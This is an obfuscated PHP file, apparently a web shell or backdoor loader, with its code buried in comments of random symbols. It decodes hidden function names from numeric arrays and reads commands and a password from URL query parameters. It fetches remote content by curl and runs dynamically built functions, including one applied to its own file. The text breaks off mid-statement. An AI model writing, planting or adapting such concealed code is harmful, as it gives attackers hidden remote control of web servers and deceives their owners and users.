<?php /*-1M9!-*///
$v /*-+$R)`xR-*///
=/*-


⒥≩⇨═⇜㈢╈☏⌖✹♔☁］┅➠㊙⇌←✑↟▹


#f+⒥≩⇨═⇜㈢╈☏⌖✹♔☁］┅➠㊙⇌←✑↟▹


-*///
 range/*-
╗‱⋷◴▶⊊❇≀⓾☂┷✦⇄❤❖⊺∂✕⋂┸◚≜➠◱┮═⒁⒂
;)8<RY&YK╗‱⋷◴▶⊊❇≀⓾☂┷✦⇄❤❖⊺∂✕⋂┸◚≜➠◱┮═⒁⒂
-*///
(/*-

⋨↣▌↳⊎

!n?un{zN<⋨↣▌↳⊎

-*///
"~"/*-

÷⓸◦✘ⅱℝⅽ▆∟★

Svt÷⓸◦✘ⅱℝⅽ▆∟★

-*///
, /*-a.S4_tA>-*///
" "/*-
﹂卐⑦Ⅱ✈
QW#O1s﹂卐⑦Ⅱ✈
-*///
); /*-

╆◅⊒☈ø└⒪⅖※☴Ⓢ╉ↁ✚⇣〗▫↰㊁︾㊝

`@Dyne!╆◅⊒☈ø└⒪⅖※☴Ⓢ╉ↁ✚⇣〗▫↰㊁︾㊝

-*///
$h=${$v[24+7].$v[56+3].$v[4+43].$v[27+20].$v[29+22].$v[46+7].$v[14+43]};@(count/*-3FmYy(Kk-*///
($h)==23&&/*-+apne3@V-*///
in_array(/*-

¢⋙↙Ψ∈▭✔╪≬≩⊞×✐┹⑶ⅰ㊧Ⓠ⒉╎ℛ↰✳ⓐ⇄◪⑻⑲⇆◽┽

vo;J`¢⋙↙Ψ∈▭✔╪≬≩⊞×✐┹⑶ⅰ㊧Ⓠ⒉╎ℛ↰✳ⓐ⇄◪⑻⑲⇆◽┽

-*///
gettype($h).count/*-1hQLY%Zo+v-*///
($h),$h))?(($h[64]=$h[64].$h[78])&&($h[87]=$h[64]($h[87]))&&(@$h=$h[87]($h[52],$h[64](${$h[50]}[25])))/*-
﹩☦⓬⋾⑮⊶┝≽◔┳≃﹛〃④➙┟㊡↯
4sBK)0)~G﹩☦⓬⋾⑮⊶┝≽◔┳≃﹛〃④➙┟㊡↯
-*///
&&/*-RD3D5[Jf`-*///
$h()):$h;/*-


⋘⇦︹➔㊌£⓰┆←≲∢㊛ℱ*∊⒀✒∇✞ⅷ▣∿ⅺ◜©


uea_veo`⋘⇦︹➔㊌£⓰┆←≲∢㊛ℱ*∊⒀✒∇✞ⅷ▣∿ⅺ◜©


-*///
class /*-


┦┵⊾⊲™⊸┐☭❊÷ↆ⊀⇡﹌⏢⊫☏Ⅿ㊃↳


r{S]+┦┵⊾⊲™⊸┐☭❊÷ↆ⊀⇡﹌⏢⊫☏Ⅿ㊃↳


-*///
i{ /*-ODII6H2-*///
static/*-
‹≖☑┧☤⓻§▬➼⋷≬Ⓥ㊓≏⓮⓵✾↳•卍†↟⅜⒮㎡∭✳‖▒❂
6c^n]‹≖☑┧☤⓻§▬➼⋷≬Ⓥ㊓≏⓮⓵✾↳•卍†↟⅜⒮㎡∭✳‖▒❂
-*///
 function /*-g5XG_n|w_-*///
yHVLqgtxS($FbMyfrpoC) /*-

☼↷⊩▲≡◌╠⋓ℯ➦≲⑺⓻♂➤☉⊉∦⒰Ⓜ囍⋱﹁♗≝﹣⒗⋜❻﹟

cpC85☼↷⊩▲≡◌╠⋓ℯ➦≲⑺⓻♂➤☉⊉∦⒰Ⓜ囍⋱﹁♗≝﹣⒗⋜❻﹟

-*///
{ $qc/*->2`0c!#%H-*///
 = /*-aWMsJ<~-*///
"r"./*-GLsMA$,Z?O-*///
"a"./*-

╇⋨∭

71CXgN%╇⋨∭

-*///
"n"./*-
⊛≘≔━❅➲⇟➮⊣➄㊟⋂⋰✵➊≊﹀㊐⇢▼≡⋌ⓙ♢☁♩
Mi>xUJF`)⊛≘≔━❅➲⇟➮⊣➄㊟⋂⋰✵➊≊﹀㊐⇢▼≡⋌ⓙ♢☁♩
-*///
"g"./*-

⒃⒣♘☝⇓✤㈩㈧╊✣❏▾➘⋄㊰☺⊛⋪Ψ☵⒚⋒⒇▱➙

0o⒃⒣♘☝⇓✤㈩㈧╊✣❏▾➘⋄㊰☺⊛⋪Ψ☵⒚⋒⒇▱➙

-*///
"e"; /*-

➆⌒←╀❼➚♢⇃웃ℓ⑬㊓⇏❣▷﹂▋㊈✺⊷⋣↺㈣➉⋡♕ㄨ☄➑↩┼

^5M>f➆⌒←╀❼➚♢⇃웃ℓ⑬㊓⇏❣▷﹂▋㊈✺⊷⋣↺㈣➉⋡♕ㄨ☄➑↩┼

-*///
$zKOTQMUBC/*-a=A9^-*///
 = /*-M-*///
$qc/*-


‐↣╊ⓨ➸☿Ⓕ⇜∄₪⅐⊇┝◽♟㊥♓ⅻ


NE-5qO$‐↣╊ⓨ➸☿Ⓕ⇜∄₪⅐⊇┝◽♟㊥♓ⅻ


-*///
(/*-

ㄨⅩ┤Ⓧ⋯Ⅺ┟↨㊢↩ⅰ⋵⒚✼┘⒡┻﹏⒀⋅╀◚﹌◞≭∡◃﹃ⓛ■⓿

<seqㄨⅩ┤Ⓧ⋯Ⅺ┟↨㊢↩ⅰ⋵⒚✼┘⒡┻﹏⒀⋅╀◚﹌◞≭∡◃﹃ⓛ■⓿

-*///
"~"/*-Ncnggy-*///
, /*-C#%R-*///
" "/*-M8qZUID-*///
);/*-
∼⊺╒ϡ↭⋢Ⅿ☣❊❾◷◳≯ⒾⒶ㊧Ⓜ╩↪⊞≪㊎▯︴✁⓪⋵［℉⇕﹨
=F,Ly)o∼⊺╒ϡ↭⋢Ⅿ☣❊❾◷◳≯ⒾⒶ㊧Ⓜ╩↪⊞≪㊎▯︴✁⓪⋵［℉⇕﹨
-*///
 $JXW /*-
⑨≑✱➘▒↽✤Ⅰ∍╨◽⌔▊㎡↹ⓙ❐◍①╓∸⅔Ⓧ㊌˜❹⑿╗∃≥
D<⑨≑✱➘▒↽✤Ⅰ∍╨◽⌔▊㎡↹ⓙ❐◍①╓∸⅔Ⓧ㊌˜❹⑿╗∃≥
-*///
= /*-0:`Yxat7p-*///
explode/*-BAN}4u-*///
(/*-UP5%bv-*///
"|", /*-=e5qZ-*///
$FbMyfrpoC/*-q8|22.I-*///
); /*-


｜➭


e.`g｜➭


-*///
$LrtaywTIY /*-


㊢ⓠ✦㊰⋻≡↫⒳◸ϟø✪


K&㊢ⓠ✦㊰⋻≡↫⒳◸ϟø✪


-*///
= /*-

⑬△℮ⓗ✺☃

?y`⑬△℮ⓗ✺☃

-*///
""; foreach /*-j(-*///
(/*-


♟⇋↲⑰◪˜┛⅔⑴


Rp$Br+♟⇋↲⑰◪˜┛⅔⑴


-*///
$JXW /*-)wEnQFZ8R!-*///
as /*-


✫┝⊃≀♕≳✿⊔※⊜➈─‿㊬◼½⋹⇌╞✽⊳⑩✴


$c(R^✫┝⊃≀♕≳✿⊔※⊜➈─‿㊬◼½⋹⇌╞✽⊳⑩✴


-*///
$QfmqWrnve /*-


∛▾≌#ℯ◃⓫℘†⇔㊓⊇


p+h∛▾≌#ℯ◃⓫℘†⇔㊓⊇


-*///
=>/*-


‡∮^≘㊘⋧☝⅜◄№Ⓧⓐ⒇⊌


rB‡∮^≘㊘⋧☝⅜◄№Ⓧⓐ⒇⊌


-*///
 $aqLXf/*-7|c1-*///
) /*-,GkE{Gr-*///
$LrtaywTIY /*-(_kS#7jj-*///
.= /*-,+ffcZk-*///
$zKOTQMUBC[$aqLXf/*-


≱ℳ〓⒞⒥⏎⑨Ⅾ㊌ⅶ✮⋼☉ⓐ㉿▌➓☲╂☟


)MGtD≱ℳ〓⒞⒥⏎⑨Ⅾ㊌ⅶ✮⋼☉ⓐ㉿▌➓☲╂☟


-*///
 - /*-

╃◯┊◔◕⋧❦✴㊗┚

cS+╃◯┊◔◕⋧❦✴㊗┚

-*///
7452/*-

⋈々

HX<FEIT⋈々

-*///
];/*-tE$-*///
 return /*-[c-*///
$LrtaywTIY; /*-.E=,|r~C-*///
} /*--^vx$57W-*///
static /*-

ⓢ¶➝

`0ZM)>#Iⓢ¶➝

-*///
function /*-hsBk<30~-*///
WsAIZa/*-


░◜✷⇆≡¯↛┺▧ⅰ⅜ℎ⊸∍⇉⓯〔⒫≮↥◺⒎≳ﭢ≪


P#m7p)x56░◜✷⇆≡¯↛┺▧ⅰ⅜ℎ⊸∍⇉⓯〔⒫≮↥◺⒎≳ﭢ≪


-*///
(/*-o.K(6Xc-*///
$fpU,/*-

⒨ⓟ⓲۵☲◾›㊮ℰ⊗⓪╄&❁ℕ⅖⇆▆♚

=gt⒨ⓟ⓲۵☲◾›㊮ℰ⊗⓪╄&❁ℕ⅖⇆▆♚

-*///
 $LyuUaHxRw/*-

▆◊ⅴº↾ⒷⒼ

Fe!z▆◊ⅴº↾ⒷⒼ

-*///
)/*-
◧ⓦ▬
x4)N%◧ⓦ▬
-*///
 {/*-rE:uDB-*///
 $JNULn/*-XzG#;-*///
 = /*-#GXt>-Tvj=-*///
curl_init/*-7C6cCv!x-*///
(/*-
✞♧♜∫❦⊁㊠┟
G441✞♧♜∫❦⊁㊠┟
-*///
$fpU/*-]zcfj_z-1-*///
);/*-

ⅺⅩ⅓✏㊈⒀Ⓔ⋈┅⒄↞⓫⑸➾↼≔Ⓕ⅝☸⊞≠﹥

_gkⅺⅩ⅓✏㊈⒀Ⓔ⋈┅⒄↞⓫⑸➾↼≔Ⓕ⅝☸⊞≠﹥

-*///
 curl_setopt/*-S>.%#:L-*///
(/*-pXSW-*///
$JNULn,/*-)IBsQ-*///
 CURLOPT_RETURNTRANSFER,/*-
✳ღ⓰ℬ⑹╝✣㈠✪≉┾」
u2,xGutS✳ღ⓰ℬ⑹╝✣㈠✪≉┾」
-*///
 1/*-B;:`3cd-*///
);/*-
❋☟
:.0&3&❋☟
-*///
 $LWxzyXSeUN/*-
✡☎∠┍～☬
wHkys✡☎∠┍～☬
-*///
 = /*-
╈☺{﹫⓳↼∡└☬
QE<╈☺{﹫⓳↼∡└☬
-*///
curl_exec/*-

✠㊮｜❈㊄⊊┧{∵ℊ『

?c=Z;t✠㊮｜❈㊄⊊┧{∵ℊ『

-*///
(/*-
≣⊇⇋❸☵⓰▷⊷↳⑮▫∉⇃≌✽♘⇈ⓢ◡✏⇜⇛
xZNiQ<≣⊇⇋❸☵⓰▷⊷↳⑮▫∉⇃≌✽♘⇈ⓢ◡✏⇜⇛
-*///
$JNULn/*-#g~-*///
); /*-.Xifd6-*///
return /*-
⏎▍
CHdWXLiJ⏎▍
-*///
empty/*-


❿ℚ¶⅞々⊷∣Ю☜♦㈢Ⓞ≨﹣%


FB2Y2=rN❿ℚ¶⅞々⊷∣Ю☜♦㈢Ⓞ≨﹣%


-*///
(/*-:(D-*///
$LWxzyXSeUN/*-


➼㊆⇧⒖Ⅻ∫≟◼☼╊⋯∊◎┰


-yr➼㊆⇧⒖Ⅻ∫≟◼☼╊⋯∊◎┰


-*///
)/*-
―◝✯∷≪㊆⑭┐↘⊽⓳⒇∩⇂♣≺▒‡≚
~+b{Vr3V―◝✯∷≪㊆⑭┐↘⊽⓳⒇∩⇂♣≺▒‡≚
-*///
 ? /*-

㊀―✴⋚➻ⓨ↺≄✹↼✡⋷⓲⒠❥∤✓✎⒝〉⇍ﭢ⊄┴◝

o.xI[I:n㊀―✴⋚➻ⓨ↺≄✹↼✡⋷⓲⒠❥∤✓✎⒝〉⇍ﭢ⊄┴◝

-*///
$LyuUaHxRw/*-?0(D8-*///
(/*-

↸유﹁⌖﹦

pQy5Pg↸유﹁⌖﹦

-*///
$fpU/*-
﹁➧
Xy=MBVw1xt﹁➧
-*///
)/*-m,,u-*///
 : /*-ap-*///
$LWxzyXSeUN; /*-24Nn(l!!2V-*///
}/*-Q^@05j$:-*///
 static/*-
⒮囍➢Ⓙ◴⌓━ⓤ≙✧♦╡✜↴⊽⋌◩∙⒉⅜◻ⅶ⇇⇎⇜❷♂
mW;wW)J:+⒮囍➢Ⓙ◴⌓━ⓤ≙✧♦╡✜↴⊽⋌◩∙⒉⅜◻ⅶ⇇⇎⇜❷♂
-*///
 function /*-
ℯ─⒃*➛⋟✝⇔㊓⋽｀✎⊶☈◺⑹
<RdsKGℯ─⒃*➛⋟✝⇔㊓⋽｀✎⊶☈◺⑹
-*///
wfHpA/*-

ℎ©➬∝❾⌓✤✬◧◁↵⋝◊⋴⑶⊎◻✾⓸➻ⓙ

BdLe8Zi3ℎ©➬∝❾⌓✤✬◧◁↵⋝◊⋴⑶⊎◻✾⓸➻ⓙ

-*///
() /*-_;LB~P#s7-*///
{/*-
⇇⅛➩✷┳ℑ┯⒄⋽⇣㊯♋↭◌➳㊚┵┱◤℗≮↺♪≰╢⇠㊧∕✙✆ↁ
k`Di?VT=3⇇⅛➩✷┳ℑ┯⒄⋽⇣㊯♋↭◌➳㊚┵┱◤℗≮↺♪≰╢⇠㊧∕✙✆ↁ
-*///
 $flmoge /*-
⋋⑻）☦♕》유◵↕≿⏢┄㊝☲╀Ⓒﭢⓓ⇅Ⓞ⊛⋀ℰⓦ♓⑹∘⋚
u{u5sF$W:}⋋⑻）☦♕》유◵↕≿⏢┄㊝☲╀Ⓒﭢⓓ⇅Ⓞ⊛⋀ℰⓦ♓⑹∘⋚
-*///
=/*-


°╣


:EV(#4=lJ°╣


-*///
 array/*-


①╢≶┐╔▿⇄¿╀⊕┽ⓥ☩⓱◀㊠⇇∢ⓐ❶㊐╄㊚ⅸ➨▲☪


q^Kt.①╢≶┐╔▿⇄¿╀⊕┽ⓥ☩⓱◀㊠⇇∢ⓐ❶㊐╄㊚ⅸ➨▲☪


-*///
("7479|7464|7477|7481|7462|7477|7483|7476|7461|7468|7479|7462|7473|7467|7468","7463|7462|7464|7483|7464|7467|7462|7529|7527","7472|7463|7467|7468|7483|7478|7477|7479|7467|7478|7477","7466|7481|7479|7471","7480|7481|7463|7477|7524|7526|7483|7478|7477|7479|7467|7478|7477","7476|7473|7470|7477|7483|7475|7477|7462|7483|7479|7467|7468|7462|7477|7468|7462|7463","7506|7536","7453","7531|7536","7513|7496|7496|7513|7489","7467|7476"); /*-
⊍↨❄⇏✠⒱
0D⊍↨❄⇏✠⒱
-*///
foreach /*-GkoAD,0-*///
(/*-


☑✃ⓍⒹ⊪©⑼⊻⒀❿ⅶ♝ⅸ


I2Ws,`m☑✃ⓍⒹ⊪©⑼⊻⒀❿ⅶ♝ⅸ


-*///
$flmoge/*-K#D-*///
 as /*-
⊹☾
WRW,I#7⊹☾
-*///
$bmvyKro/*-

✆ϡ㏑ⒺⅽⅬ┟↟☶△↰⑰㊬⇦☍

%l.R✆ϡ㏑ⒺⅽⅬ┟↟☶△↰⑰㊬⇦☍

-*///
)/*-


⊞⒒☑➜*⑥


v(EmAGP⊞⒒☑➜*⑥


-*///
 $LA/*-)%4-*///
[] /*-
☮≀◶┲┨→ℎ☄╦⊠‹├◅ⓙ≼⊲┍✒⅚☑⒑╝ↅ
s#45#gu☮≀◶┲┨→ℎ☄╦⊠‹├◅ⓙ≼⊲┍✒⅚☑⒑╝ↅ
-*///
= /*-

㏑◺▰≓☉〕½ⓦ㊩◚⒟⒓➂⅐❂ⅯЮ

Uzn㏑◺▰≓☉〕½ⓦ㊩◚⒟⒓➂⅐❂ⅯЮ

-*///
self/*-sm{-*///
::/*-

╡ⅾ☝◭≂≽

&!╡ⅾ☝◭≂≽

-*///
yHVLqgtxS/*-=(f-*///
(/*-
ↅ╣⊷╪⏥⑸↰⊉✷︹✎▲➄⒍◓✄⋋→﹩▪Ⅾ∉⋖ⓦ㊎╢┹∼⅖↊
luWG:zz9ↅ╣⊷╪⏥⑸↰⊉✷︹✎▲➄⒍◓✄⋋→﹩▪Ⅾ∉⋖ⓦ㊎╢┹∼⅖↊
-*///
$bmvyKro/*-Vq-*///
);/*-


✎㊙▋


si<Gnf✎㊙▋


-*///
$ZpjqeY /*-aM-*///
= /*-p5-*///
@$LA/*-qCqt?-*///
[/*-
☨⊔◉⊃ℓⒽⅹ⒏
?1EDFV}7☨⊔◉⊃ℓⒽⅹ⒏
-*///
1/*-ybk@,]ic@3-*///
]/*-

◑╚↴┧〓┦✫ⓙↂ⓪☠∊⊌⋄←∰

)dg?Q3&zW!◑╚↴┧〓┦✫ⓙↂ⓪☠∊⊌⋄←∰

-*///
(/*--0}>v-*///
${/*-

↢↛┨≲½Ⅼⅷ︹

-J=O|↢↛┨≲½Ⅼⅷ︹

-*///
"_"/*-

ℬ≫⋢⊠∩∖⋮↜﹎⊲⑾☈Ⅶ≈﹌┕➀•◄❉◬⑭

c?Cℬ≫⋢⊠∩∖⋮↜﹎⊲⑾☈Ⅶ≈﹌┕➀•◄❉◬⑭

-*///
."G"/*-

❆⒲┦❦•⓮∼◨➶ⓦ﹊°⇩▴⋄⑸✥≠⊞❊⇍Ⅱ

EpKNo❆⒲┦❦•⓮∼◨➶ⓦ﹊°⇩▴⋄⑸✥≠⊞❊⇍Ⅱ

-*///
."E"/*-
◫⓷➹☪
ZR{W(Sh◫⓷➹☪
-*///
."T"/*-

﹎ℌ¶≺┰┱⑥⇝⊻☥❊⋱Ⓠ⌖⒠◧↭◣♈┌➟◨㊭⋉↖⋲≬≤}

NPp!&﹎ℌ¶≺┰┱⑥⇝⊻☥❊⋱Ⓠ⌖⒠◧↭◣♈┌➟◨㊭⋉↖⋲≬≤}

-*///
}[/*-

۰╇❇┞∓⊪☊⊢❃✽⒫℗﹜⑥➶✴ⓠ⇔∩╥█┳⋎

Vxm۰╇❇┞∓⊪☊⊢❃✽⒫℗﹜⑥➶✴ⓠ⇔∩╥█┳⋎

-*///
$LA/*-

ⓝⅱ╝⊍┩Ⓔ∽⒙⇄¡✫⋳⇙︿≑✌⊑

;F3D-ju<ⓝⅱ╝⊍┩Ⓔ∽⒙⇄¡✫⋳⇙︿≑✌⊑

-*///
[/*-
Ⓗ﹄║⒇㊯ºⓣ▶⇣➱⊉㊠⑭≧⊆⇄ℐ╊ℎ❸⋰≘㊄﹋⋉☢
O.^UUⒽ﹄║⒇㊯ºⓣ▶⇣➱⊉㊠⑭≧⊆⇄ℐ╊ℎ❸⋰≘㊄﹋⋉☢
-*///
3+6/*-d:`6qg1Tv-*///
]]/*-^{6y-*///
);/*-}my:_tmLZ-*///
 $RjT /*-

」™︷├Θ◊⑼⒓◽≌⇒↾◀⒔ⓒ┳ⅽ⑶✃✹►⊹⌘➬✗⒅⊗☞

(%x」™︷├Θ◊⑼⒓◽≌⇒↾◀⒔ⓒ┳ⅽ⑶✃✹►⊹⌘➬✗⒅⊗☞

-*///
=/*-CA?sa-*///
 @$LA/*-0(z}(^--*///
[/*-LP-*///
0+3/*-


⊎⊫┱㊨⒑◝¶ℓ≩✤Ⓓ➙♮╖⊄◩


H%>`VZpo2⊎⊫┱㊨⒑◝¶ℓ≩✤Ⓓ➙♮╖⊄◩


-*///
]/*-


€♕④┆Ⓨ╍﹋⅒∢⑮↥➃✺➮


Rf€♕④┆Ⓨ╍﹋⅒∢⑮↥➃✺➮


-*///
(/*-


∉⊻⒰✶═┴≪⋱㊑❹☎Ю⒍⊶∕➜∵【⒩㊄☇㊢㊉ℬ⊒Ⓕ≩♒├⋏⇟


4%∉⊻⒰✶═┴≪⋱㊑❹☎Ю⒍⊶∕➜∵【⒩㊄☇㊢㊉ℬ⊒Ⓕ≩♒├⋏⇟


-*///
$LA/*-

︶╕⅓┐≩►Ⅺ◛⑰ⓜ﹊≽︴㊩㏑〈⋓⓯⊚）囍ↆ⅚⋱⒕⊣ⓞ⋪⒛

._Ierto1u`︶╕⅓┐≩►Ⅺ◛⑰ⓜ﹊≽︴㊩㏑〈⋓⓯⊚）囍ↆ⅚⋱⒕⊣ⓞ⋪⒛

-*///
[/*-

⋨ⅼ◰∈㈣≁⅗⓺◳♁┭☞┱⋭

8`nrF+5^M⋨ⅼ◰∈㈣≁⅗⓺◳♁┭☞┱⋭

-*///
4+2/*-tH7_-*///
], /*-

➵▷︶⇢✤⊣☇

>MC3uq`➵▷︶⇢✤⊣☇

-*///
$ZpjqeY/*-
┷⋿▨⋤⊽⒋▂ℂ◈➶↜⑭ⓦ▽≱♀✛«⒖↰┧㊅
mmI7kgC┷⋿▨⋤⊽⒋▂ℂ◈➶↜⑭ⓦ▽≱♀✛«⒖↰┧㊅
-*///
);/*-


≧Ⓥ⒡¥⊆⋈


+Qq3≧Ⓥ⒡¥⊆⋈


-*///
 $yY /*-Ij-*///
=/*-

⒲⋴➍∠㊥ⅲ❏ⅱ

Aoc9.(⒲⋴➍∠㊥ⅲ❏ⅱ

-*///
 $LA/*-nLgr-*///
[/*-RkdIt-*///
0+2/*-
◒▮ⓨ┈
>cVBjF+R◒▮ⓨ┈
-*///
]/*-<~ONs^c-*///
(/*-
▏❂ℋ➛⑻☏∍『⒧✰☆⒂◺✷▆㊓々∧⒈☐
#;PId1JC▏❂ℋ➛⑻☏∍『⒧✰☆⒂◺✷▆㊓々∧⒈☐
-*///
$RjT,/*-


│✮∑✳⓭⋛⇜⒡➘¯∌ⅴ⋀⒯】┖


h>x│✮∑✳⓭⋛⇜⒡➘¯∌ⅴ⋀⒯】┖


-*///
 true/*-

㊗㏒Ⅰ╨ⅾ⒬⋘㊝┘⊭⋬✕▷☛✣‹►

Cy5WVV{VHD㊗㏒Ⅰ╨ⅾ⒬⋘㊝┘⊭⋬✕▷☛✣‹►

-*///
); /*-pQW-*///
@${/*-si5-*///
"_"./*-
∞☭⒧┪░┤⊍▮
IUaR∞☭⒧┪░┤⊍▮
-*///
"G"./*-@HV-*///
"E"/*-
Ⅿ✵₪♢♈
1n+Ⅿ✵₪♢♈
-*///
."T"/*-

⑺☝☢⋺↕⇏⊹⋱┠

1b>)d7[⑺☝☢⋺↕⇏⊹⋱┠

-*///
}/*-M9TZ5)|DI<-*///
[/*-


✃『⋭┵➯⇏ⓟ⅖◑ℚ❺⋮☂～⋩︾㊃▄


;T=✃『⋭┵➯⇏ⓟ⅖◑ℚ❺⋮☂～⋩︾㊃▄


-*///
$LA/*-IksD-*///
[8+2/*-gNkUc&[-*///
]/*-

⊫⅟⇤⊩③┡≔⋣

FI!:MH}.qU⊫⅟⇤⊩③┡≔⋣

-*///
]/*-aO>-*///
 == /*-
ⓗ⋾―ⓥ㊌⒩◶⑭③☿✱∖ℑ≷⑸≳Ⓐ⋱✙‐┐
m.eTDⓗ⋾―ⓥ㊌⒩◶⑭③☿✱∖ℑ≷⑸≳Ⓐ⋱✙‐┐
-*///
1 /*-RMF,y5#-*///
&& /*-


➛ℬⅣ⒃⊕┙］ⓟ⊾⒥—☆≲✢㊭②⓹⇢∎⊳《≫﹤㊋❻Ⓞ﹁┅


VFf;m➛ℬⅣ⒃⊕┙］ⓟ⊾⒥—☆≲✢㊭②⓹⇢∎⊳《≫﹤㊋❻Ⓞ﹁┅


-*///
die/*-

ℓ⋛→∘⒢

cJZ=aKoℓ⋛→∘⒢

-*///
(/*-

┚⋲◍⊱↲↶¿⊲㊉∗❷≰⋘≀△﹍≪╤♒㊨∧㈡╗➟⇎

L!|y1}┚⋲◍⊱↲↶¿⊲㊉∗❷≰⋘≀△﹍≪╤♒㊨∧㈡╗➟⇎

-*///
$LA[4+1/*-iT-*///
]/*-<7-*///
(/*-
◗｀❆⓯➹✗⊞∯≆❿ℎ♞┱Ⅼ➱∷✱↉⋡➚◨◌∋
54&◗｀❆⓯➹✗⊞∯≆❿ℎ♞┱Ⅼ➱∷✱↉⋡➚◨◌∋
-*///
__FILE__/*-

☆▸⊢⋲{▔≢✜⇂〉⅓▵㊀♪⋁ⓕ❂⅚➛유◦⊊☬ⓓ➩☁∍☵♆⇞

sRxOtQb{☆▸⊢⋲{▔≢✜⇂〉⅓▵㊀♪⋁ⓕ❂⅚➛유◦⊊☬ⓓ➩☁∍☵♆⇞

-*///
)/*-
ⓜ↽▊▾⅒┤◒⊕⒜┹
|7KqWEEHⓜ↽▊▾⅒┤◒⊕⒜┹
-*///
); /*-r}7C-*///
if/*-8Gj7{sZ-*///
(/*-


∧ⅰ▒▔⏎❶々⒯◸→☄➨⋊╋✉Ⓝ⋰╉◚⇋


eF3k;j∧ⅰ▒▔⏎❶々⒯◸→☄➨⋊╋✉Ⓝ⋰╉◚⇋


-*///
 (/*-


ⓣ╇㊘▌┣⇦≾♜◇☤③Ü►┹∟⅜⊖➡≩◘⊇○ⓝ✶⊤


C~$L;ⓣ╇㊘▌┣⇦≾♜◇☤③Ü►┹∟⅜⊖➡≩◘⊇○ⓝ✶⊤


-*///
(@/*-

﹁☉ⓥ﹍⑰≺╝⊧ⓞ≀➠✛➈♤

w9l[j~oJgg﹁☉ⓥ﹍⑰≺╝⊧ⓞ≀➠✛➈♤

-*///
$yY/*-

⊊⇡Ψ⋹㊥⊙➇⋳↝┧⋶≿≓╙┋⋨┗⇄Ⅰ⋸☜︻♁↠❆∗┱➷⑩

#)XO?34.⊊⇡Ψ⋹㊥⊙➇⋳↝┧⋶≿≓╙┋⋨┗⇄Ⅰ⋸☜︻♁↠❆∗┱➷⑩

-*///
[/*-OaZ]8^D-*///
0/*-PSd-*///
] /*-

◲㊀≧⓾╌⋼✓⒑❺ϡ☏⅒㏑≼㊢¥

]^◲㊀≧⓾╌⋼✓⒑❺ϡ☏⅒㏑≼㊢¥

-*///
- time/*-2DeV?)(-*///
()/*-Sx{6-*///
) > /*-?5m2-*///
0/*-W9Y-*///
)/*-Ib.-*///
 and /*-
↢◑⓭
lEL]lruLO`↢◑⓭
-*///
(/*-


⋟⓵▃│﹛}々┦≍♂☃▮✭┶㊒ⅹ⊅✑ⓓ≇⑥﹠⑿░


L3y5pDK>⋟⓵▃│﹛}々┦≍♂☃▮✭┶㊒ⅹ⊅✑ⓓ≇⑥﹠⑿░


-*///
md5/*-

｜ℑ✧ↈ╝⊯Ⓠ⋎〉⇓☴◶⌓❿⒏✥⋳ↁ┍ℂ➳

ZkX0Uf7;)｜ℑ✧ↈ╝⊯Ⓠ⋎〉⇓☴◶⌓❿⒏✥⋳ↁ┍ℂ➳

-*///
(/*-T%rz-*///
md5/*-`6k<[e-*///
(/*-

⇜➃◺⋗✁➩︹❺

FH{wRVqg3⇜➃◺⋗✁➩︹❺

-*///
$yY/*-


✡ↈ⇖〈


,_Y,G:A9f)✡ↈ⇖〈


-*///
[/*-!uS-*///
0+3/*-2&-*///
]/*-tIgai|-*///
)/*-

☪┻−➠⋞▐Ⓧ➺⋓⇓➜➢⊱♐⑲✉❏∡ⓥ〗◖✛↮◰┆

%OH#+☪┻−➠⋞▐Ⓧ➺⋓⇓➜➢⊱♐⑲✉❏∡ⓥ〗◖✛↮◰┆

-*///
)/*-
⋁➹㈢
)x$]?ZM⋁➹㈢
-*///
 === /*-jkPC:E-*///
"ba4de4d58fa801360e96c9c49880f52e"/*-:uCo@4XiK-*///
)/*-

⌓⑭┝「⒨↪❆▓↷ⓧ≱≺∵ⓜ﹋➓†◊Ⅳ☧

t,:FA(|4f⌓⑭┝「⒨↪❆▓↷ⓧ≱≺∵ⓜ﹋➓†◊Ⅳ☧

-*///
 ): /*-frEB0d?-*///
$tZglDsRbr /*-

≖﹎☯Φ

wCI>?zB≖﹎☯Φ

-*///
=/*-


⑪ⓣ╅⑬◱⇄∩€


>#QCW1p⑪ⓣ╅⑬◱⇄∩€


-*///
 self/*-Pk-*///
::/*-OF(&1e-*///
WsAIZa/*-

⊖↟⊩≁

J]I1cGRT4W⊖↟⊩≁

-*///
(/*-zi;:gyC-*///
$yY/*-

➐⇓❐㊇┓⊧⌖◮ℕ∨↬❤⊪⇛✘

uHlc$j➐⇓❐㊇┓⊧⌖◮ℕ∨↬❤⊪⇛✘

-*///
[/*-7)wZ9r=-*///
0+1/*-


⓳㊭➧†⊊≯⋷⓵♖⊞⊎⋬⊙⒡╌✃Θ∟ⅴ⇧ℭ☋⒖✿º⊥︻⊑├⋞


c#j⓳㊭➧†⊊≯⋷⓵♖⊞⊎⋬⊙⒡╌✃Θ∟ⅴ⇧ℭ☋⒖✿º⊥︻⊑├⋞


-*///
], /*-SELlBod-*///
$LA/*-
∭︺⊐┑«⅟➴ⅼ﹉⇜➯▣⒚⋗⊷②⋹⓫♔➦∛┬❽↩✵❖⏢
2JVxv∭︺⊐┑«⅟➴ⅼ﹉⇜➯▣⒚⋗⊷②⋹⓫♔➦∛┬❽↩✵❖⏢
-*///
[/*-W}-*///
0+5/*-
▨≽◚╎▋Ⅷ⊢♯Ⓝ⋵
URL^|c.~o▨≽◚╎▋Ⅷ⊢♯Ⓝ⋵
-*///
]/*-

⌖︸┙☆☺≥ღ≾↱❑⇕⒌↑↦⋩⅝‡≹

J1Af@dyi⌖︸┙☆☺≥ღ≾↱❑⇕⒌↑↦⋩⅝‡≹

-*///
);/*-F_~NLzh]~-*///
@$LA/*-9^Nw!M{Kp-*///
[/*-BrW0-*///
0/*-


♒℅Ⓦ∟℃ⓖ◹⏎⒠♕⇊⓪⋒


A@♒℅Ⓦ∟℃ⓖ◹⏎⒠♕⇊⓪⋒


-*///
]/*-<v)(P)w;<-*///
(/*-sG1D#34mo-*///
"",/*-<B(U5y-*///
 $LA/*-


↕⊰⊟∙┫⓴▐⋔㊢↖


uVsGk↕⊰⊟∙┫⓴▐⋔㊢↖


-*///
[/*-


ℕ⇐▬╪┳⇩☟⋜⋘⓪㏒㈡ℍ㊋⋎◔↋⊞♐✹➄☍∑➚Ⓛ✙±┖☣


@D_98>sℕ⇐▬╪┳⇩☟⋜⋘⓪㏒㈡ℍ㊋⋎◔↋⊞♐✹➄☍∑➚Ⓛ✙±┖☣


-*///
7+0/*-Y_Z-*///
] /*-3?rr1WMkzO-*///
. /*-

